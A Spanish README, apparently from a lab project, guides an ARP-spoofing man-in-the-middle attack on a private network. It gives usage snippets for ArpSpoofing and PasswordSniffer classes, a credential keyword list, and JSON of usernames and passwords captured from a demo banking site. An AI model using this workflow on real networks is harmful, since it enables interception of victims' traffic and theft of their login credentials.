# ARP SPOOFING
## _Guia rápida de como hacer un ataque arp spoofing_

El proposito de esta guia será realizar un ataque de hombre en el medio en una red para capturar todas las peticiones http y https de una victima 

- La ip 192.168.1.80 es el atacante
- La ip 192.168.1.254 es el la puerta de enlace

![ARP Ubuntu](arp-a.png)

- La ip 192.168.1.72 es la victima

![ARP Ubuntu](ifconfig.png)

Hacemos uso de la clase ArpSpoofing donde tendremos la ip de la victima y la ip de la puerta de enlace para ponerle nuestro nombre de la mac a la ip victima y rastreas todas las peticiones http y https

```sh
from ArpSpoofing import ArpSpoofing

arp_spoofing = ArpSpoofing()
# arp_spoofing.spoofer('victima, puerta_de_enlace)
arp_spoofing.spoofer('192.168.1.72','192.168.1.254')
```

## Después del ataque

![ARP Ubuntu](before_spoofing.png)

Observamos que el nombre de la mac de la puerta de enlace dentro de la victima cambió por el mismo nombre del atacante, asi que todo el tráfico de la victima podemos capturarlo desde el atacante


# Captura de datos de las peticiones 

Dentro del atacante usaremos como ejemplo el sitio web **altoromutual.com** donde realizaremos un login falso y esta petición la capturaremos con la clase **PasswordSniffer.py** que le tendremos que pasar una lista de posibles atributos que viajen detro de las peticiones


![ARP Ubuntu](altoro.png)


```sh
from PasswordSniffer import PasswordSniffer

wordlists = ["username", "user", "usuario", "password", "passw", "login"]
sniffer = PasswordSniffer(wordlists)
sniffer.sniffer()
```

La información que se captura de las peticiones realizadas se guarda en un archivo en formato Json


```sh
[
    {
        "victima": "192.168.1.72",
        "destino": "65.61.137.117",
        "dominio": "altoromutual.com:8080",
        "informacion_capturada": "uid=dsaf&passw=adsf&btnsubmit=login"
    },
    {
        "victima": "192.168.1.72",
        "destino": "65.61.137.117",
        "dominio": "altoromutual.com:8080",
        "informacion_capturada": "uid=dsaf&passw=adsf&btnsubmit=login"
    },
    {
        "victima": "192.168.1.72",
        "destino": "65.61.137.117",
        "dominio": "altoromutual.com:8080",
        "informacion_capturada": "uid=dsaf&passw=adsf&btnsubmit=login"
    },
    {
        "victima": "192.168.1.72",
        "destino": "65.61.137.117",
        "dominio": "altoromutual.com:8080",
        "informacion_capturada": "uid=dsaf&passw=adsf&btnsubmit=login"
    }
]
```
